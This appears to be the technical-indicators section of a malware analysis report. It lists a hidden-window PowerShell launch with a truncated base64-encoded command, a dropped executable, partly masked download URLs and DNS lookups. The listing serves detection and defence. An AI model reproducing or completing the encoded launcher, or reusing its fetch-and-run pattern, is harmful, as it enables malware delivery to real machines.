Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAVgBrAGUAcQB4AG0AdgBhAHAAYQB0AHgAegAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBMAHEAeQBxAHgAawBqAGwAdQBqAGoAZQAgACMAPgAgACQASABnAGYAbgB4AHEAcgBlAHIAegBi...
- %HOMEPATH%\444.exe
- http://ol##s.com/wp-admin/m584b1j/
- http://ma###ngoci.com/sitemap/0u6HYzVs8n/
- http://www.su###ng-web.com/temp/qMhTRJ/
- http://de#.#####itions-marketing.com/wp-admin/5B3B1/
- http://de#.#####itions-marketing.com/wp-login.php?re###################################################################################
- DNS ASK ol##s.com
- DNS ASK ma###ngoci.com
- DNS ASK pr####.#irmaprofesional.com
- DNS ASK su###ng-web.com
- DNS ASK de#.#####itions-marketing.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAVgBrAGUAcQB4AG0AdgBhAHAAYQB0AHgAegAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBMAHEAeQBxAHgAawBqAGwAdQBqAGoAZQAgACMAPgAgACQASABnAGYAbgB4AHEAcgBlAHIAegBi...' (with hidden window)